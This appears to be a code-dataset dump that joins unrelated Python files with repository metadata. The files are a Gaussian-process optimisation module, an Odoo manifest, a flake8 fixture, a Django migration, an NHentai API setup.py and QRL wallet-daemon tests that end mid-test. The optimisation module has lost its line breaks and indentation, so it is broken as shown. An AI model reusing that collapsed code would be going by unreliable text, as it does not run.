import GPy from GPyOpt.util.general import get_quantiles import GPyOpt import numpy as np from math import pow, log, sqrt import pandas as pd # train_x : history x # train_y : history y # num_init : The number of initial sample points # lsx : the collected x in last round # lsy : the text function value corresponding to the collected x in last round # P : Represents the historical confidence level of the acquisition functions in acquisition library # domain : refer to the information of the variable of BayesianOptimization called by GPyOpt # f : refer to the optimization objectives information of BayesianOptimization called by GPyOpt # num_obj : The selected number of acquisition functions that build up multi-objective optimization. # eta is a hyperparameters class GP: def __init__(self, iter, train_x, train_y, exx, exy, k, num_init, lsx, lsy, P, f, domain, model, eta=0.9): self.train_x = train_x.copy() self.train_y = train_y.copy() self.mean = np.mean(exy) self.std = np.std(exy) self.num_train = exx.shape[0] self.lsx = lsx.copy() self.lsy = lsy.copy() self.exx = exx.copy() self.exy = exy.copy() self.dim = self.exx.shape[1] self.k = k self.num_init = num_init self.P = P self.eta = eta self.domain = domain self.f = f self.iter = iter self.m = model self.tau = np.min(train_y) self.burnin = 200 self.n_samples = 10 self.subsample_interval = 10 self.sample() self.update() self.mean = np.mean(train_y) self.std = np.std(train_y) self.train_y = (train_y.copy() - self.mean) / self.std self.num_train = train_x.shape[0] kern = GPy.kern.Matern52(input_dim=self.dim, ARD=True) self.m = GPy.models.GPRegression(self.train_x, self.train_y, kern, noise_var=0) def update(self): tx = self.train_x.tolist() ty = self.train_y.ravel().tolist() lsy = self.lsy.ravel().tolist() self.lsbesty = np.min(self.exy) history_data = pd.DataFrame({'x': tx, 'y': ty}) history_data.sort_values(by='y', ascending=True, inplace=True) history_data.reset_index(drop=True, inplace=True) self.rank = [] self.hq_x 
= [] self.phi_alpha = [] alpha = 3 for i in lsy: if len(history_data.index[history_data['y'] < i]) > 0: self.rank.append(history_data.index[history_data['y'] < i][-1] + 1) else: self.rank.append(0) if self.rank[-1] <= int(alpha): self.hq_x.append(1) else: self.hq_x.append(0) self.phii = self.hq_x self.rank = np.array(self.rank) self.hq_x = np.array(self.hq_x) # Stores information about the collection library self.acqusition_type = ['MPI', 'EI', 'LCB', 'LCB', 'LCB', 'LCB', 'LCB'] self.hyperpara = [0.001, 0.001, [0.5, 0.5], [0.5, 0.05], [5, 0.1], [10, 0.1], [30, 0.1]] # LP_recommend_num is the regarding threshold of recommended number when using LP-alpha(x) acquisition functions # beta is equal to 0.5 LP_recommend_num = int(0.5 * self.k) # k / 2 current_P = [] for i in range(len(self.acqusition_type)): if self.acqusition_type[i] == 'LCB': self.set_kappa(self.hyperpara[i][0], self.hyperpara[i][1]) LP_checker = GPyOpt.methods.BayesianOptimization(f=self.f, domain=self.domain, acquisition_type=self.acqusition_type[i], normalize_Y=True, X=self.exx, Y=self.exy, evaluator_type='local_penalization', batch_size=LP_recommend_num, acquisition_weight=self.kappa) else: LP_checker = GPyOpt.methods.BayesianOptimization(f=self.f, domain=self.domain, acquisition_type=self.acqusition_type[i], normalize_Y=True, X=self.exx, Y=self.exy, evaluator_type='local_penalization', batch_size=LP_recommend_num, acquisition_jitter=self.hyperpara[i]) LP_checker.run_optimization(max_iter=1) LP_acq_x = LP_checker.suggested_sample # acq_recommend_bound is the threshold at which the acquisition function recommends the sample points or not acq_recommend_bound = np.inf for x in LP_acq_x: pys, pss = self.predict(x) if self.acqusition_type[i] == 'LCB': acq_calc = -self.LCB(pys, pss) elif self.acqusition_type[i] == 'MPI': acq_calc = self.PI(pys, pss, self.hyperpara[i]) else: acq_calc = self.EI(pys, pss, self.hyperpara[i]) if acq_calc < acq_recommend_bound: acq_recommend_bound = acq_calc # acq_val is the 
value of the acquisition function # under the current acquisition function of the previous round of sampling points acq_val = [] phi_alpha = [] for x in self.lsx: pys, pss = self.predict(x) if self.acqusition_type[i] == 'LCB': acq_calc = -self.LCB(pys, pss) elif self.acqusition_type[i] == 'MPI': acq_calc = self.PI(pys, pss, self.hyperpara[i]) else: acq_calc = self.EI(pys, pss, self.hyperpara[i]) acq_val.append(acq_calc) if acq_calc >= acq_recommend_bound - 1e-7: phi_alpha.append(1) else: phi_alpha.append(0) phi_alpha = np.array(phi_alpha) self.phi_alpha.append(phi_alpha.tolist()) # cp is used to calculate the penalty value of current acquisition function cp = 0 for i in range(self.lsx.shape[0]): cp += abs(self.hq_x[i] - phi_alpha[i]) * abs(self.lsbesty - lsy[i]) if self.hq_x[i] == 1 and phi_alpha[i] == 1: cp += lsy[i] - self.lsbesty current_P.append(cp) current_P = np.array(current_P) # self.CP is a comprehensive information that synthesizes the historical penalty value of acquisition functions # and the penalty value obtained by the previous round of sampling points, # and needs to be stored by calling the main function self.CP = self.eta * self.P + current_P df_CP = pd.DataFrame({'cp': self.CP.tolist()}) # self.current_choice stores the subscripts of the num_obj acquisition functions selected in the acquisition # function library. 
# self.confidence returns the confidence level obtained by recombining the penalty value of the selected # acquisition functions in the current round, which is a one-dimensional ndarray # num_obj : The number of selected acquisition functions that build up multi-objective optimization # num_obj is equal to 3 self.current_choice = df_CP.index[df_CP['cp'].rank(method='first') - 3 < 1e-3].tolist() self.T = [] minn = np.min(self.CP) for i in self.current_choice: self.T.append(self.CP[i]) self.T = np.array(self.T) self.T = (self.T + 1e-4) / np.sum((self.T + 1e-4)) def sample(self): self.m.optimize_restarts(num_restarts=10) if not 0: self.s = np.array(np.array(self.m[:])) self.s = self.s.reshape(1, self.s.size) self.ms = np.array([self.m]) else: hmc = GPy.inference.mcmc.HMC(self.m, stepsize=5e-2) s = hmc.sample(num_samples=self.n_samples * self.subsample_interval) self.s = s[0::self.subsample_interval] self.ms = [] for i in range(self.s.shape[0]): samp_kern = GPy.kern.Matern52(input_dim=self.dim, ARD=True) samp_m = GPy.models.GPRegression(self.train_x, self.train_y, samp_kern) samp_m[:] = self.s[i] samp_m.parameters_changed() self.ms = np.append(self.ms, samp_m) def predict_sample(self, x, hyp_vec): self.m.kern.variance = hyp_vec[0] self.m.kern.lengthscale = hyp_vec[1:1 + self.dim] self.m.likelihood.variance = hyp_vec[1 + self.dim] py, ps2 = self.m.predict(x.reshape(1, x.size)) py = self.mean + (py * self.std) ps2 = ps2 * (self.std ** 2) return py, ps2 def set_kappa(self, upsilon, delta): num_train = self.num_train t = 1 + max(int((num_train - self.num_init) / self.k), 0) self.kappa = sqrt( upsilon * 2 * log(pow(t, 2.0 + self.dim / 2.0) * 3 * pow(np.pi, 2) / (3 * delta))) # kappa of LCB def predict(self, x): num_samples = self.s.shape[0] pys = np.zeros((num_samples, 1)) pss = np.zeros((num_samples, 1)) for i in range(num_samples): m, v = self.ms[i].predict(x.reshape(1, x.size)) pys[i] = m[0][0] pss[i] = v[0][0] pys = self.mean + (pys * self.std) pss = pss * (self.std ** 
2) return pys, np.sqrt(pss) def LCB(self, pys, pss): num_samples = pys.shape[0] acq = 0 for i in range(num_samples): y = pys[i] s = pss[i] lcb = y - self.kappa * s acq += lcb acq /= self.s.shape[0] return acq def EI(self, pys, pss, eps): num_samples = pys.shape[0] acq = 0 for i in range(num_samples): y = pys[i] s = pss[i] phi, Phi, u = get_quantiles(eps, self.tau, y, s) f_acqu = s * (u * Phi + phi) acq += f_acqu acq /= self.s.shape[0] return acq def PI(self, pys, pss, eps): num_samples = pys.shape[0] acq = 0 for i in range(num_samples): y = pys[i] s = pss[i] _, Phi, _ = get_quantiles(eps, self.tau, y, s) f_acqu = Phi acq += f_acqu acq /= self.s.shape[0] return acq def MACE_acq(self, x): pys, pss = self.predict(x) list = [] for i in self.current_choice: if self.acqusition_type[i] == 'LCB': self.set_kappa(self.hyperpara[i][0], self.hyperpara[i][1]) lcb = self.LCB(pys, pss) list.append([lcb, 0]) elif self.acqusition_type[i] == 'MPI': pi = self.PI(pys, pss, self.hyperpara[i]) list.append([pi, 1]) else: ei = self.EI(pys, pss, self.hyperpara[i]) list.append([ei, 1]) return list
10,980
-12
312
ddb0483295a6a1a976fc5fd283466768897fe4c3
350
py
Python
definition_theme/__manifest__.py
talway/OdooERPApp
2c44baa8ad020550098e18e630dbc57d3927d1ca
[ "Apache-2.0" ]
null
null
null
definition_theme/__manifest__.py
talway/OdooERPApp
2c44baa8ad020550098e18e630dbc57d3927d1ca
[ "Apache-2.0" ]
null
null
null
definition_theme/__manifest__.py
talway/OdooERPApp
2c44baa8ad020550098e18e630dbc57d3927d1ca
[ "Apache-2.0" ]
2
2019-11-11T12:34:03.000Z
2020-09-21T07:25:41.000Z
# -*- coding: utf-8 -*- { 'name': "自定义主题界面风格", 'summary': """自定义界面风格模块""", 'description': """用以自定义Odoo界面风格的模块""", 'author': "SuXueFeng", 'website': "https://www.sxfblog.com", 'category': 'style', 'version': '0.1', 'depends': ['base'], 'data': [ 'views/WebAssetsBackend.xml', ], 'demo': [ ], }
19.444444
42
0.488571
# -*- coding: utf-8 -*- { 'name': "自定义主题界面风格", 'summary': """自定义界面风格模块""", 'description': """用以自定义Odoo界面风格的模块""", 'author': "SuXueFeng", 'website': "https://www.sxfblog.com", 'category': 'style', 'version': '0.1', 'depends': ['base'], 'data': [ 'views/WebAssetsBackend.xml', ], 'demo': [ ], }
0
0
0
4e7b9e9936d24d03c5bc95bfa26b6063c5eacaab
195
py
Python
tests/run_flake8/noerror.py
10sr/flake8-no-implicit-concat
11db2327ffc122d9481c6e03a77cf62b1dc85d25
[ "MIT" ]
15
2020-05-21T19:39:58.000Z
2022-03-22T11:04:12.000Z
tests/run_flake8/noerror.py
10sr/flake8-no-implicit-concat
11db2327ffc122d9481c6e03a77cf62b1dc85d25
[ "MIT" ]
43
2020-05-20T05:19:20.000Z
2021-11-25T05:34:51.000Z
tests/run_flake8/noerror.py
10sr/flake8-no-implicit-concat
11db2327ffc122d9481c6e03a77cf62b1dc85d25
[ "MIT" ]
1
2020-08-25T23:04:08.000Z
2020-08-25T23:04:08.000Z
a = "aaa" b = "bbb" + "ccc" d = """ddd eee fff""" + "ggg" l = ["hhh", "iii" + "jjj"] noqa = "k" "l" # noqa: NIC001 noqa = ("k" # noqa: NIC002 "l") print("abc" + "def", "ghi")
15
30
0.410256
a = "aaa" b = "bbb" + "ccc" d = """ddd eee fff""" + "ggg" l = ["hhh", "iii" + "jjj"] noqa = "k" "l" # noqa: NIC001 noqa = ("k" # noqa: NIC002 "l") print("abc" + "def", "ghi")
0
0
0
67bca61bcc5eccb73a28567b84e02d4c1c3a79b7
1,786
py
Python
bookmark_website/bookmark_app/migrations/0001_initial.py
thejeshpr/bookmarks
eff748c0e7a6e3d211d3e87b25ffefca612726ce
[ "MIT" ]
null
null
null
bookmark_website/bookmark_app/migrations/0001_initial.py
thejeshpr/bookmarks
eff748c0e7a6e3d211d3e87b25ffefca612726ce
[ "MIT" ]
null
null
null
bookmark_website/bookmark_app/migrations/0001_initial.py
thejeshpr/bookmarks
eff748c0e7a6e3d211d3e87b25ffefca612726ce
[ "MIT" ]
null
null
null
# Generated by Django 2.2.7 on 2019-11-18 16:44 from django.db import migrations, models import django.db.models.deletion
42.52381
169
0.595185
# Generated by Django 2.2.7 on 2019-11-18 16:44 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Category', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(help_text='Category Name', max_length=50, unique=True)), ('slug', models.CharField(max_length=50, unique=True)), ('timestamp', models.DateTimeField(auto_now_add=True)), ('updated_at', models.DateTimeField(auto_now=True)), ], options={ 'verbose_name_plural': 'Categories', }, ), migrations.CreateModel( name='Bookmark', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('desc', models.TextField(blank=True, help_text='Description', null=True)), ('title', models.CharField(blank=True, help_text='bookmark title', max_length=500, null=True, unique=True)), ('slug', models.CharField(max_length=500, unique=True)), ('url', models.URLField(blank=True, help_text='URL', max_length=2000, null=True)), ('timestamp', models.DateTimeField(auto_now_add=True)), ('updated_at', models.DateTimeField(auto_now=True)), ('category', models.ForeignKey(help_text='Category', on_delete=django.db.models.deletion.CASCADE, related_name='bookmarks', to='bookmark_app.Category')), ], ), ]
0
1,639
23
f675775f12c8350ddef35bc639c03e2223ccc8a6
1,931
py
Python
setup.py
calibear20/NHentai-API
c543f96f4088dd0f25842e9935f2f6c84317dc55
[ "MIT" ]
null
null
null
setup.py
calibear20/NHentai-API
c543f96f4088dd0f25842e9935f2f6c84317dc55
[ "MIT" ]
null
null
null
setup.py
calibear20/NHentai-API
c543f96f4088dd0f25842e9935f2f6c84317dc55
[ "MIT" ]
null
null
null
from setuptools import setup import os env = os.getenv('environment_name') or 'dev' if env == 'prd': setup( name='NHentai-API', version='0.0.17', description='NHentai Python API made using webscraping.', long_description=readme(), long_description_content_type='text/markdown', classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], url='https://github.com/AlexandreSenpai/NHentai-API', author='AlexandreSenpai', author_email='alexandrebsramos@hotmail.com', keywords='Tagshentai, nhentai, nhentai.net, API, NSFW', license='MIT', packages=['NHentai', 'NHentai.entities', 'NHentai.utils'], install_requires=['requests', 'beautifulsoup4', 'aiohttp', 'expiringdict'], include_package_data=True, zip_safe=False ) elif env == 'dev': setup( name='dev-nhentai-build', version='0.0.6', description='NHentai Python API made using webscraping.', long_description=readme(), long_description_content_type='text/markdown', classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], url='https://github.com/AlexandreSenpai/NHentai-API', author='AlexandreSenpai', author_email='alexandrebsramos@hotmail.com', keywords='Tagshentai, nhentai, nhentai.net, API, NSFW', license='MIT', packages=['dev_nhentai', 'dev_nhentai.entities', 'dev_nhentai.utils'], install_requires=['requests', 'beautifulsoup4', 'aiohttp', 'expiringdict'], include_package_data=True, zip_safe=False )
35.759259
83
0.612118
from setuptools import setup import os def readme(): with open('README.md') as f: return f.read() env = os.getenv('environment_name') or 'dev' if env == 'prd': setup( name='NHentai-API', version='0.0.17', description='NHentai Python API made using webscraping.', long_description=readme(), long_description_content_type='text/markdown', classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], url='https://github.com/AlexandreSenpai/NHentai-API', author='AlexandreSenpai', author_email='alexandrebsramos@hotmail.com', keywords='Tagshentai, nhentai, nhentai.net, API, NSFW', license='MIT', packages=['NHentai', 'NHentai.entities', 'NHentai.utils'], install_requires=['requests', 'beautifulsoup4', 'aiohttp', 'expiringdict'], include_package_data=True, zip_safe=False ) elif env == 'dev': setup( name='dev-nhentai-build', version='0.0.6', description='NHentai Python API made using webscraping.', long_description=readme(), long_description_content_type='text/markdown', classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], url='https://github.com/AlexandreSenpai/NHentai-API', author='AlexandreSenpai', author_email='alexandrebsramos@hotmail.com', keywords='Tagshentai, nhentai, nhentai.net, API, NSFW', license='MIT', packages=['dev_nhentai', 'dev_nhentai.entities', 'dev_nhentai.utils'], install_requires=['requests', 'beautifulsoup4', 'aiohttp', 'expiringdict'], include_package_data=True, zip_safe=False )
49
0
23
8f607160751ecb6032d08116ea48d35715e78810
25,103
py
Python
tests/daemon/test_walletd.py
scottdonaldau/QRL
fb78c1cdf227330ace46f590a36cc6a52c7af3fe
[ "MIT" ]
null
null
null
tests/daemon/test_walletd.py
scottdonaldau/QRL
fb78c1cdf227330ace46f590a36cc6a52c7af3fe
[ "MIT" ]
null
null
null
tests/daemon/test_walletd.py
scottdonaldau/QRL
fb78c1cdf227330ace46f590a36cc6a52c7af3fe
[ "MIT" ]
null
null
null
# coding=utf-8 # Distributed under the MIT software license, see the accompanying # file LICENSE or http://www.opensource.org/licenses/mit-license.php. from unittest import TestCase from mock import Mock from pyqrllib.pyqrllib import bin2hstr, hstr2bin from qrl.daemon.walletd import WalletD from qrl.generated import qrl_pb2 from qrl.core.txs.TransferTransaction import TransferTransaction from qrl.core.Wallet import WalletDecryptionError from qrl.core.misc import logger from tests.misc.helper import set_qrl_dir, get_alice_xmss, get_bob_xmss logger.initialize_default()
44.508865
120
0.569374
# coding=utf-8 # Distributed under the MIT software license, see the accompanying # file LICENSE or http://www.opensource.org/licenses/mit-license.php. from unittest import TestCase from mock import Mock from pyqrllib.pyqrllib import bin2hstr, hstr2bin from qrl.daemon.walletd import WalletD from qrl.generated import qrl_pb2 from qrl.core.txs.TransferTransaction import TransferTransaction from qrl.core.Wallet import WalletDecryptionError from qrl.core.misc import logger from tests.misc.helper import set_qrl_dir, get_alice_xmss, get_bob_xmss logger.initialize_default() class TestWalletD(TestCase): def __init__(self, *args, **kwargs): self.passphrase = '你好' self.qaddress = "Q010400ff39df1ba4d1d5b8753e6d04c51c34b95b01fc3650c10ca7b296a18bdc105412c59d0b3b" self.hex_seed = "0104008441d43524996f76236141d16b7b324323abf796e77ad" \ "7c874622a82f5744bb803f9b404d25733d0db82be7ac6f3c4cf" self.mnemonic = "absorb drank lute brick cure evil inept group grey " \ "breed hood reefy eager depict weed image law legacy " \ "jockey calm lover freeze fact lively wide dread spiral " \ "jaguar span rinse salty pulsar violet fare" super(TestWalletD, self).__init__(*args, **kwargs) def test_init(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() self.assertIsNotNone(walletd) def test_qaddress_to_address(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = "Q010600968c3408cba5192d75c11cec909e803fc590e82463216b5a04ce8e447f76b4e02c0d3d81" address = walletd.qaddress_to_address(qaddress) self.assertEqual(qaddress[1:], bin2hstr(address)) def test_authenticate(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd.authenticate() walletd._wallet = Mock() walletd._wallet.encrypted = Mock(return_value=True) with self.assertRaises(ValueError): walletd.authenticate() def test_encrypt_last_item(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd.authenticate() walletd.add_new_address(height=4) self.assertFalse(walletd.get_wallet_info()[2]) 
walletd._passphrase = self.passphrase walletd._encrypt_last_item() self.assertTrue(walletd.get_wallet_info()[2]) def test_get_wallet_index_xmss(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) index, xmss = walletd._get_wallet_index_xmss(qaddress, 0) self.assertEqual(index, 0) self.assertEqual(xmss.qaddress, qaddress) def test_add_new_address(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 1) def test_add_new_address2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 1) qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 2) def test_add_address_from_seed(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress1 = walletd.add_address_from_seed(seed=self.hex_seed) # Using hexseed self.assertEqual(self.qaddress, qaddress1) self.assertEqual(len(walletd.list_address()), 1) def test_add_address_from_seed2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress1 = walletd.add_address_from_seed(seed=self.hex_seed) # Using hexseed self.assertEqual(self.qaddress, qaddress1) self.assertEqual(len(walletd.list_address()), 1) walletd.remove_address(self.qaddress) self.assertEqual(len(walletd.list_address()), 0) qaddress2 = walletd.add_address_from_seed(seed=self.mnemonic) # Using mnemonic self.assertEqual(self.qaddress, qaddress2) self.assertEqual(len(walletd.list_address()), 1) def test_list_address(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 1) list_address = walletd.list_address() self.assertEqual(list_address[0], 
qaddress) def test_remove_address(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 1) result = walletd.remove_address(qaddress) self.assertTrue(result) self.assertEqual(len(walletd.list_address()), 0) def test_remove_address2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') self.assertEqual(len(walletd.list_address()), 1) result = walletd.remove_address(qaddress) self.assertTrue(result) self.assertEqual(len(walletd.list_address()), 0) result = walletd.remove_address("Q123") self.assertFalse(result) self.assertEqual(len(walletd.list_address()), 0) def test_get_recovery_seeds(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) self.assertEqual(qaddress[0], 'Q') seeds = walletd.get_recovery_seeds(qaddress) self.assertIsInstance(seeds, tuple) walletd.remove_address(qaddress) self.assertEqual(len(walletd.list_address()), 0) qaddress2 = walletd.add_address_from_seed(seeds[0]) # Using Hex Seed self.assertEqual(qaddress, qaddress2) walletd.remove_address(qaddress2) self.assertEqual(len(walletd.list_address()), 0) qaddress2 = walletd.add_address_from_seed(seeds[1]) # Using Mnemonic self.assertEqual(qaddress, qaddress2) walletd.remove_address(qaddress2) self.assertEqual(len(walletd.list_address()), 0) def test_get_wallet_info(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() version, len_address_items, encrypted = walletd.get_wallet_info() self.assertEqual(version, 1) self.assertEqual(len_address_items, 0) self.assertFalse(encrypted) def test_push_transaction(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() alice_xmss = get_alice_xmss() bob_xmss = get_bob_xmss() tx = TransferTransaction.create(addrs_to=[bob_xmss.address], amounts=[1], fee=1, xmss_pk=alice_xmss.pk) 
walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) walletd._push_transaction(tx, alice_xmss) walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.UNKNOWN)) with self.assertRaises(Exception): walletd._push_transaction(tx, alice_xmss) def test_relay_transfer_txn(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) alice_xmss = get_alice_xmss(4) bob_xmss = get_bob_xmss(4) qaddresses_to = [alice_xmss.qaddress, bob_xmss.qaddress] amounts = [1000000000, 1000000000] walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_transfer_txn(qaddresses_to=qaddresses_to, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) def test_relay_transfer_txn2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) walletd.encrypt_wallet(self.passphrase) walletd.unlock_wallet(self.passphrase) alice_xmss = get_alice_xmss(4) bob_xmss = get_bob_xmss(4) qaddresses_to = [alice_xmss.qaddress, bob_xmss.qaddress] amounts = [1000000000, 1000000000] walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_transfer_txn(qaddresses_to=qaddresses_to, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.relay_transfer_txn(qaddresses_to=qaddresses_to, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) def test_relay_message_txn(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = 
walletd.add_new_address(height=4) walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_message_txn(message='Hello QRL!', fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) def test_relay_message_txn2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) walletd.encrypt_wallet(self.passphrase) walletd.unlock_wallet(self.passphrase) walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_message_txn(message='Hello QRL!', fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.relay_message_txn(message='Hello QRL!', fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) def test_relay_token_txn(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) alice_xmss = get_alice_xmss(4) bob_xmss = get_bob_xmss(4) qaddresses = [alice_xmss.qaddress, bob_xmss.qaddress] amounts = [1000000000, 1000000000] walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_token_txn(symbol='QRL', name='Quantum Resistant Ledger', owner_qaddress=alice_xmss.qaddress, decimals=5, qaddresses=qaddresses, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) def test_relay_token_txn2(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) walletd.encrypt_wallet(self.passphrase) walletd.unlock_wallet(self.passphrase) alice_xmss = get_alice_xmss(4) bob_xmss = get_bob_xmss(4) qaddresses = [alice_xmss.qaddress, 
bob_xmss.qaddress] amounts = [1000000000, 1000000000] walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_token_txn(symbol='QRL', name='Quantum Resistant Ledger', owner_qaddress=alice_xmss.qaddress, decimals=5, qaddresses=qaddresses, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.relay_token_txn(symbol='QRL', name='Quantum Resistant Ledger', owner_qaddress=alice_xmss.qaddress, decimals=5, qaddresses=qaddresses, amounts=amounts, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) def test_relay_transfer_token_txn(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) walletd.encrypt_wallet(self.passphrase) walletd.unlock_wallet(self.passphrase) alice_xmss = get_alice_xmss(4) bob_xmss = get_bob_xmss(4) qaddresses_to = [alice_xmss.qaddress, bob_xmss.qaddress] amounts = [1000000000, 1000000000] walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_transfer_token_txn(qaddresses_to=qaddresses_to, amounts=amounts, token_txhash='', fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.relay_transfer_token_txn(qaddresses_to=qaddresses_to, amounts=amounts, token_txhash='', fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) def test_relay_slave_txn(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address(height=4) walletd.encrypt_wallet(self.passphrase) walletd.unlock_wallet(self.passphrase) alice_xmss = get_alice_xmss(4) slave_pks = [alice_xmss.pk] access_types = [0] 
walletd._public_stub.PushTransaction = Mock( return_value=qrl_pb2.PushTransactionResp(error_code=qrl_pb2.PushTransactionResp.SUBMITTED)) tx = walletd.relay_slave_txn(slave_pks=slave_pks, access_types=access_types, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) self.assertIsNotNone(tx) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.relay_slave_txn(slave_pks=slave_pks, access_types=access_types, fee=100000000, master_qaddress=None, signer_address=qaddress, ots_index=0) def test_encrypt_wallet(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() with self.assertRaises(ValueError): walletd.encrypt_wallet(passphrase=self.passphrase) walletd.add_new_address() walletd.encrypt_wallet(passphrase=self.passphrase) with self.assertRaises(Exception): walletd.encrypt_wallet(passphrase=self.passphrase) def test_lock_wallet(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd.add_new_address() walletd.encrypt_wallet(passphrase=self.passphrase) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.add_new_address() def test_unlock_wallet(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() walletd.add_new_address() walletd.encrypt_wallet(passphrase=self.passphrase) walletd.lock_wallet() with self.assertRaises(ValueError): walletd.add_new_address() with self.assertRaises(WalletDecryptionError): walletd.unlock_wallet(passphrase='pass123') walletd.unlock_wallet(passphrase=self.passphrase) walletd.add_new_address() self.assertEqual(len(walletd.list_address()), 2) def test_change_passphrase(self): with set_qrl_dir("wallet_ver1"): walletd = WalletD() qaddress = walletd.add_new_address() walletd.encrypt_wallet(passphrase=self.passphrase) walletd.lock_wallet() passphrase2 = 'pass000' with self.assertRaises(ValueError): walletd.change_passphrase(old_passphrase='pass123', new_passphrase='pass234') walletd.change_passphrase(old_passphrase=self.passphrase, new_passphrase=passphrase2) with 
